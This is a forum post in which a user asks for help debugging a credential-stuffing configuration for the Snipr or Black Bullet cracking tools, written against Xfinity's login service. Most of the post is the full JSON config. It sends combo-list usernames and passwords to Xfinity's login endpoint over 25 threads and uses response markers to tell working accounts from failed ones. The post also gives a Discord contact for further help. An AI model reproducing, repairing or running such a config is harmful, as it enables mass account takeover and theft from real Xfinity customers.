Sign in to follow this  
truegamermlg

Config makers, What I'm I missing?

Recommended Posts

Im trying to learn how to make config for snipr or black bullet. I've made some of the easy ones and the last one i made gave me some errors i dont know how to fix please help. Also will post my last one made on snipr.

you guys can hit me up on discord. carrito sin gomas#5294 

{

 "General": {

   "schemeVersion": 1.1,

   "name": "Xfinity",

   "proxyType": "Proxyless",

   "comboType": "Email/Username",

   "credit": "carro sin gomas, truegamermlg",

   "threads": "25"

 },

 "Requests": [

   {

     "successKeys": [

       "||oauth.xfinity.com/oauth/authorize"

     ],

     "method": "POST",

     "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36",

     "url": "https://login.xfinity.com/login",

     "reqName": "Post Method",

     "contentType": "application/x-www-form-urlencoded",

     "accept": "",

     "referer": "",

     "postData": "user=&passwd=&r=comcast.net&s=oauth&deviceAuthn=false&continue=https%3A%2F%2Foauth.xfinity.com%2Foauth%2Fauthorize%3Fredirect_uri%3Dmyaccountmobile%253A%252F%252Fauth%26client_id%3Dmy-account-mobile%26response_type%3Dcode%26prompt%3Dselect_account%26state%3D%26code_challenge%3D%26code_challenge_method%3D%26response%3D1&ipAddrAuthn=false&forceAuthn=2&lang=en&passive=false&client_id=my-account-mobile&reqId=",

     "failureKeys": [

       "||https://login.xfinity.com/login",

       "||compromised"

     ]

   },

   {

     "method": "GET",

     "reqName": "Get Method",

     "url": "https://customer.xfinity.com/",

     "accept": "",

     "referer": "",

     "userAgent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36",

     "successKeys": [

       "https://oauth.xfinity.com/oauth/authorize"

     ],

     "failureKeys": [

       "https://login.xfinity.com/login"

     ]

   }

 ]

}

Share this post


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

Sign in to follow this